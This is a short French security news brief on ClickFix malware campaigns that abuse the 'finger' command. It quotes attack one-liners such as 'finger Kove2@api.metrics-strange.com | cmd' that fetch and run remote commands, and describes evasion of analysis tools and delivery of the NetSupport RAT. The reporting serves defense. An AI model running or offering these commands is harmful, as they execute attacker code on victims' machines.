Des acteurs malveillants ont ressuscité la commande “finger”, vieille de plusieurs décennies, pour permettre l’exécution de commandes à distance dans de nouvelles attaques de malware ClickFix. Un fichier batch a été identifié, exploitant la commande “finger root@finger.nateams[.]com” pour récupérer et exécuter des commandes via cmd.exe. Une enquête plus approfondie a révélé une campagne ClickFix utilisant la commande “finger Kove2@api.metrics-strange.com | cmd”, similaire à une autre campagne signalée. Cette intrusion s’est avérée plus sophistiquée, ciblant des outils de recherche de logiciels malveillants tels que WinDump, filemon, Procmon, x64dbg, vmmap, processlasso, Fiddler, et Everywhere. En l’absence d’outils d’analyse de malware, une archive ZIP usurpant un fichier PDF est chargée, extrayant le package RAT de NetSupport Manager. Pour contrer cette exploitation, il est essentiel de bloquer le trafic sortant vers le port TCP 79.
Les acteurs malveillants relancent-ils la commande ‘finger’ pour de nouvelles attaques ClickFix ?
